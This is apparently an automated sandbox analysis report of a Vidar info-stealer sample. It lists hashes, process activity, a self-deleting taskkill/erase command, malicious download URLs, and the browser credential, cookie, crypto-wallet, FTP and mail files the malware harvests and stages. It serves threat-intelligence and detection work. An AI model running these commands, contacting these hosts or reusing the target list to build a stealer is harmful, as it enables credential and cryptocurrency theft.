paladin316

Exes_8874219db6846885b78323d8de8249d1_exe_2019-08-16_00_30.txt

Aug 15th, 2019
  1.  
  2. * MalFamily: "Vidar"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_8874219db6846885b78323d8de8249d1.exe"
  7. * File Size: 678912
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "d55e8d9f5498fdabc85c3e55b0abf07a10ad31c2e4af79dc7f21e44d4da9a0e0"
  10. * MD5: "8874219db6846885b78323d8de8249d1"
  11. * SHA1: "e9876fe687fd6386ee935a29ec8b691f05ffa51c"
  12. * SHA512: "554870cb99e843664f35d2cc1a1be951224c9b7d0bb695ddaf7dcfd6fd7456922a4905609c4c6548b2fcd7eeee27c1c0fe2e9923ba38639051cb7d9d792918e6"
  13. * CRC32: "24A82439"
  14. * SSDEEP: "12288:S11mCcWR7KYBfZgCedwlQ2aRusyKCqQgx0Ipmk/OkbavES2by:c1oW5nfZgChe1RPyBqaIpmkmkOvEjy"
  15.  
  16. * Process Execution:
  17. "Exes_8874219db6846885b78323d8de8249d1.exe",
  18. "Exes_8874219db6846885b78323d8de8249d1.exe",
  19. "8NRP3XENDA.exe",
  20. "cmd.exe",
  21. "taskkill.exe",
  22. "services.exe",
  23. "lsass.exe",
  24. "svchost.exe",
  25. "svchost.exe",
  26. "WmiPrvSE.exe",
  27. "svchost.exe",
  28. "taskhost.exe"
  29.  
  30.  
  31. * Executed Commands:
  32. "\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_8874219db6846885b78323d8de8249d1.exe\"",
  33. "C:\\ProgramData\\8NRP3XENDA.exe ",
  34. "C:\\Windows\\System32\\cmd.exe /c taskkill /im Exes_8874219db6846885b78323d8de8249d1.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Exes_8874219db6846885b78323d8de8249d1.exe & exit",
  35. "C:\\Windows\\system32\\lsass.exe",
  36. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  37. "C:\\Users\\user\\AppData\\Roaming\\Intel Rapid\\IntelRapid.exe",
  38. "taskkill /im Exes_8874219db6846885b78323d8de8249d1.exe /f"
  39.  
  40.  
  41. * Signatures Detected:
  42.  
  43. "Description": "Creates RWX memory",
  44. "Details":
  45.  
  46.  
  47. "Description": "Possible date expiration check, exits too soon after checking local time",
  48. "Details":
  49.  
  50. "process": "8NRP3XENDA.exe, PID 1520"
  51.  
  52.  
  53.  
  54.  
  55. "Description": "A process attempted to delay the analysis task.",
  56. "Details":
  57.  
  58. "Process": "WmiPrvSE.exe tried to sleep 420 seconds, actually delayed analysis time by 0 seconds"
  59.  
  60.  
  61. "Process": "svchost.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
  62.  
  63.  
  64.  
  65.  
  66. "Description": "Reads data out of its own binary image",
  67. "Details":
  68.  
  69. "self_read": "process: Exes_8874219db6846885b78323d8de8249d1.exe, pid: 2988, offset: 0x00000000, length: 0x000a5c00"
  70.  
  71.  
  72.  
  73.  
  74. "Description": "A process created a hidden window",
  75. "Details":
  76.  
  77. "Process": "Exes_8874219db6846885b78323d8de8249d1.exe -> C:\\ProgramData\\8NRP3XENDA.exe"
  78.  
  79.  
  80. "Process": "Exes_8874219db6846885b78323d8de8249d1.exe -> C:\\Windows\\System32\\cmd.exe"
  81.  
  82.  
  83.  
  84.  
  85. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  86. "Details":
  87.  
  88. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  89.  
  90.  
  91. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  92.  
  93.  
  94. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  95.  
  96.  
  97. "suspicious_request": "http://earphorialofts.net/72"
  98.  
  99.  
  100. "suspicious_request": "http://earphorialofts.net/freebl3.dll"
  101.  
  102.  
  103. "suspicious_request": "http://earphorialofts.net/mozglue.dll"
  104.  
  105.  
  106. "suspicious_request": "http://earphorialofts.net/msvcp140.dll"
  107.  
  108.  
  109. "suspicious_request": "http://earphorialofts.net/nss3.dll"
  110.  
  111.  
  112. "suspicious_request": "http://earphorialofts.net/softokn3.dll"
  113.  
  114.  
  115. "suspicious_request": "http://earphorialofts.net/vcruntime140.dll"
  116.  
  117.  
  118. "suspicious_request": "http://ip-api.com/line/"
  119.  
  120.  
  121. "suspicious_request": "http://earphorialofts.net/"
  122.  
  123.  
  124. "suspicious_request": "http://neecopower.com/wp-content/uploads/2019/08/client_only_64.exe"
  125.  
  126.  
  127.  
  128.  
  129. "Description": "Performs some HTTP requests",
  130. "Details":
  131.  
  132. "url": "http://earphorialofts.net/72"
  133.  
  134.  
  135. "url": "http://earphorialofts.net/freebl3.dll"
  136.  
  137.  
  138. "url": "http://earphorialofts.net/mozglue.dll"
  139.  
  140.  
  141. "url": "http://earphorialofts.net/msvcp140.dll"
  142.  
  143.  
  144. "url": "http://earphorialofts.net/nss3.dll"
  145.  
  146.  
  147. "url": "http://earphorialofts.net/softokn3.dll"
  148.  
  149.  
  150. "url": "http://earphorialofts.net/vcruntime140.dll"
  151.  
  152.  
  153. "url": "http://ip-api.com/line/"
  154.  
  155.  
  156. "url": "http://earphorialofts.net/"
  157.  
  158.  
  159. "url": "http://neecopower.com/wp-content/uploads/2019/08/client_only_64.exe"
  160.  
  161.  
  162.  
  163.  
  164. "Description": "Executed a process and injected code into it, probably while unpacking",
  165. "Details":
  166.  
  167. "Injection": "Exes_8874219db6846885b78323d8de8249d1.exe(2988) -> Exes_8874219db6846885b78323d8de8249d1.exe(292)"
  168.  
  169.  
  170.  
  171.  
  172. "Description": "Deletes its original binary from disk",
  173. "Details":
  174.  
  175.  
  176. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  177. "Details":
  178.  
  179. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 12773890 times"
  180.  
  181.  
  182.  
  183.  
  184. "Description": "Steals private information from local Internet browsers",
  185. "Details":
  186.  
  187. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  188.  
  189.  
  190. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  191.  
  192.  
  193. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\IE_Cookies.txt"
  194.  
  195.  
  196. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\Edge_Cookies.txt"
  197.  
  198.  
  199. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\Google Chrome_Default.txt"
  200.  
  201.  
  202. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  203.  
  204.  
  205. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  206.  
  207.  
  208.  
  209.  
  210. "Description": "Installs itself for autorun at Windows startup",
  211. "Details":
  212.  
  213. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IntelRapid.lnk"
  214.  
  215.  
  216.  
  217.  
  218. "Description": "Collects information about installed applications",
  219. "Details":
  220.  
  221. "Program": "Google Update Helper"
  222.  
  223.  
  224. "Program": "Microsoft Excel MUI 2013"
  225.  
  226.  
  227. "Program": "Microsoft Outlook MUI 2013"
  228.  
  229.  
  230.  
  231.  
  232. "Program": "Google Chrome"
  233.  
  234.  
  235. "Program": "Adobe Flash Player 29 NPAPI"
  236.  
  237.  
  238. "Program": "Adobe Flash Player 29 ActiveX"
  239.  
  240.  
  241. "Program": "Microsoft DCF MUI 2013"
  242.  
  243.  
  244. "Program": "Microsoft Access MUI 2013"
  245.  
  246.  
  247. "Program": "Microsoft Office Proofing Tools 2013 - English"
  248.  
  249.  
  250. "Program": "Adobe Acrobat Reader DC"
  251.  
  252.  
  253. "Program": "Microsoft Office Proofing Tools 2013 - Español"
  254.  
  255.  
  256. "Program": "Microsoft Publisher MUI 2013"
  257.  
  258.  
  259. "Program": "Outils de vérification linguistique 2013 de Microsoft Office - Français"
  260.  
  261.  
  262. "Program": "Microsoft Office Shared MUI 2013"
  263.  
  264.  
  265. "Program": "Microsoft Office OSM MUI 2013"
  266.  
  267.  
  268. "Program": "Microsoft InfoPath MUI 2013"
  269.  
  270.  
  271. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  272.  
  273.  
  274. "Program": "Microsoft Word MUI 2013"
  275.  
  276.  
  277. "Program": "Microsoft Groove MUI 2013"
  278.  
  279.  
  280.  
  281.  
  282. "Program": "Microsoft Access Setup Metadata MUI 2013"
  283.  
  284.  
  285. "Program": "Microsoft Office OSM UX MUI 2013"
  286.  
  287.  
  288. "Program": "Java Auto Updater"
  289.  
  290.  
  291. "Program": "Microsoft PowerPoint MUI 2013"
  292.  
  293.  
  294. "Program": "Microsoft Office Professional Plus 2013"
  295.  
  296.  
  297. "Program": "Adobe Refresh Manager"
  298.  
  299.  
  300. "Program": "Microsoft Office Proofing 2013"
  301.  
  302.  
  303. "Program": "Microsoft Lync MUI 2013"
  304.  
  305.  
  306.  
  307.  
  308. "Program": "Microsoft OneNote MUI 2013"
  309.  
  310.  
  311.  
  312.  
  313. "Description": "File has been identified by 17 Antiviruses on VirusTotal as malicious",
  314. "Details":
  315.  
  316. "Cylance": "Unsafe"
  317.  
  318.  
  319. "Cybereason": "malicious.687fd6"
  320.  
  321.  
  322. "APEX": "Malicious"
  323.  
  324.  
  325. "Kaspersky": "UDS:DangerousObject.Multi.Generic"
  326.  
  327.  
  328. "Endgame": "malicious (high confidence)"
  329.  
  330.  
  331. "Invincea": "heuristic"
  332.  
  333.  
  334. "McAfee-GW-Edition": "BehavesLike.Win32.ICLoader.jc"
  335.  
  336.  
  337. "FireEye": "Generic.mg.8874219db6846885"
  338.  
  339.  
  340. "SentinelOne": "DFI - Suspicious PE"
  341.  
  342.  
  343. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  344.  
  345.  
  346. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  347.  
  348.  
  349. "Acronis": "suspicious"
  350.  
  351.  
  352. "Malwarebytes": "Spyware.PredatorTheThief"
  353.  
  354.  
  355. "Rising": "Trojan.Generic@ML.100 (RDML:EhtzkKCTrdnwa6OCMtjm6Q)"
  356.  
  357.  
  358. "Fortinet": "W32/Kryptik.GTYV!tr"
  359.  
  360.  
  361. "CrowdStrike": "win/malicious_confidence_90% (D)"
  362.  
  363.  
  364. "Qihoo-360": "HEUR/QVM02.0.38B1.Malware.Gen"
  365.  
  366.  
  367.  
  368.  
  369. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  370. "Details":
  371.  
  372.  
  373. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  374. "Details":
  375.  
  376. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  377.  
  378.  
  379. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
  380.  
  381.  
  382. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e"
  383.  
  384.  
  385. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Bitcoin\\*.*"
  386.  
  387.  
  388. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Electrum\\\n"
  389.  
  390.  
  391. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  392.  
  393.  
  394. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
  395.  
  396.  
  397. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Electrum\\*.*"
  398.  
  399.  
  400. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  401.  
  402.  
  403. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Litecoin\\*.*"
  404.  
  405.  
  406. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Litecoin\\"
  407.  
  408.  
  409. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  410.  
  411.  
  412. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\NameCoin\\"
  413.  
  414.  
  415. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  416.  
  417.  
  418. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\NameCoin\\*.*"
  419.  
  420.  
  421. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  422.  
  423.  
  424. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  425.  
  426.  
  427. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\TerraCoin\\"
  428.  
  429.  
  430. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\TerraCoin\\*.*"
  431.  
  432.  
  433. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  434.  
  435.  
  436. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\PrimeCoin\\*.*"
  437.  
  438.  
  439. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  440.  
  441.  
  442. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  443.  
  444.  
  445. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\PrimeCoin\\"
  446.  
  447.  
  448. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  449.  
  450.  
  451. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FreiCoin\\*.*"
  452.  
  453.  
  454. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  455.  
  456.  
  457. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FreiCoin\\"
  458.  
  459.  
  460. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DevCoin\\"
  461.  
  462.  
  463. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  464.  
  465.  
  466. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  467.  
  468.  
  469. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DevCoin\\*.*"
  470.  
  471.  
  472. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  473.  
  474.  
  475. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Franko\\*.*"
  476.  
  477.  
  478. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Franko\\"
  479.  
  480.  
  481. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  482.  
  483.  
  484. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  485.  
  486.  
  487. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MegaCoin\\"
  488.  
  489.  
  490. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MegaCoin\\*.*"
  491.  
  492.  
  493. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  494.  
  495.  
  496. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  497.  
  498.  
  499. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  500.  
  501.  
  502. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\InfiniteCoin\\"
  503.  
  504.  
  505. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\InfiniteCoin\\*.*"
  506.  
  507.  
  508. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\IxCoin\\"
  509.  
  510.  
  511. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  512.  
  513.  
  514. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\IxCoin\\*.*"
  515.  
  516.  
  517. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  518.  
  519.  
  520. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Anoncoin\\*.*"
  521.  
  522.  
  523. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  524.  
  525.  
  526. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  527.  
  528.  
  529. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Anoncoin\\"
  530.  
  531.  
  532. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  533.  
  534.  
  535. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\BBQCoin\\"
  536.  
  537.  
  538. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\BBQCoin\\*.*"
  539.  
  540.  
  541. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  542.  
  543.  
  544. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  545.  
  546.  
  547. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DigitalCoin\\"
  548.  
  549.  
  550. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DigitalCoin\\*.*"
  551.  
  552.  
  553. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  554.  
  555.  
  556. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  557.  
  558.  
  559. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MinCoin\\"
  560.  
  561.  
  562. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MinCoin\\*.*"
  563.  
  564.  
  565. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  566.  
  567.  
  568. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  569.  
  570.  
  571. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
  572.  
  573.  
  574. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  575.  
  576.  
  577. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  578.  
  579.  
  580. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\YACoin\\"
  581.  
  582.  
  583. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\YACoin\\*.*"
  584.  
  585.  
  586. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  587.  
  588.  
  589. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FlorinCoin\\*.*"
  590.  
  591.  
  592. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  593.  
  594.  
  595. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FlorinCoin\\"
  596.  
  597.  
  598.  
  599.  
  600. "Description": "Harvests credentials from local FTP client softwares",
  601. "Details":
  602.  
  603. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  604.  
  605.  
  606.  
  607.  
  608. "Description": "Harvests information related to installed instant messenger clients",
  609. "Details":
  610.  
  611. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  612.  
  613.  
  614.  
  615.  
  616. "Description": "Harvests information related to installed mail clients",
  617. "Details":
  618.  
  619. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
  620.  
  621.  
  622. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
  623.  
  624.  
  625. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
  626.  
  627.  
  628. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
  629.  
  630.  
  631. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
  632.  
  633.  
  634. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
  635.  
  636.  
  637. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
  638.  
  639.  
  640.  
  641.  
  642. "Description": "Collects information to fingerprint the system",
  643. "Details":
  644.  
  645.  
  646. "Description": "Created network traffic indicative of malicious activity",
  647. "Details":
  648.  
  649. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  650.  
  651.  
  652. "signature": "ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious"
  653.  
  654.  
  655.  
  656.  
  657.  
  658. * Started Service:
  659. "VaultSvc"
  660.  
  661.  
  662. * Mutexes:
  663. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963"
  664.  
  665.  
  666. * Modified Files:
  667. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\passwords.txt",
  668. "C:\\ProgramData\\freebl3.dll",
  669. "C:\\ProgramData\\mozglue.dll",
  670. "C:\\ProgramData\\msvcp140.dll",
  671. "C:\\ProgramData\\nss3.dll",
  672. "C:\\ProgramData\\softokn3.dll",
  673. "C:\\ProgramData\\vcruntime140.dll",
  674. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\ld",
  675. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\historych",
  676. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\History\\Google Chrome_Default.txt",
  677. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Downloads\\Google Chrome_Default.txt",
  678. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\c",
  679. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\Google Chrome_Default.txt",
  680. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\wd",
  681. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Autofill\\Google Chrome_Default.txt",
  682. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\CC\\Google Chrome_Default.txt",
  683. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Soft\\Authy\\\\xe2\\x9a\\x80\\xcd\\x9d\\xe0\\xae\\x80\\xc7\\xae\\xeb\\x96\\x80\\xc8\\x95\\xc3\\x84\\xc7\\xae",
  684. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\IE_Cookies.txt",
  685. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\Edge_Cookies.txt",
  686. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\cookie_list.txt",
  687. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\outlook.txt",
  688. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\information.txt",
  689. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Files\\Files.zip",
  690. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Files\\Files3.zip",
  691. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e",
  692. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Ethereum\\",
  693. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Electrum\\\n",
  694. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\ElectrumLTC\\\r",
  695. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Exodus\\\n",
  696. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Exodus\\",
  697. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\ElectronCash\\\r",
  698. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MultiDoge\\\n",
  699. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Zcash\\",
  700. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DashCore\\",
  701. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Litecoin\\",
  702. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Anoncoin\\",
  703. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\BBQCoin\\",
  704. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DevCoin\\",
  705. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DigitalCoin\\",
  706. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FlorinCoin\\",
  707. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Franko\\",
  708. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FreiCoin\\",
  709. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\GoldCoinGLD\\\n",
  710. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\InfiniteCoin\\",
  711. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\IOCoin\\",
  712. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\IxCoin\\",
  713. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MegaCoin\\",
  714. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MinCoin\\",
  715. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\NameCoin\\",
  716. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\PrimeCoin\\",
  717. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\TerraCoin\\",
  718. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\YACoin\\",
  719. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\JAXX\\\r",
  720. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\US_00000000-0000-0000-0000-0000000000006747247925.zip",
  721. "C:\\ProgramData\\8NRP3XENDA.exe",
  722. "C:\\ProgramData\\8NRP3XENDA.exe:Zone.Identifier",
  723. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  724. "C:\\Users\\user\\AppData\\Roaming\\Intel Rapid\\IntelRapid.exe",
  725. "\\??\\PIPE\\srvsvc",
  726. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IntelRapid.lnk",
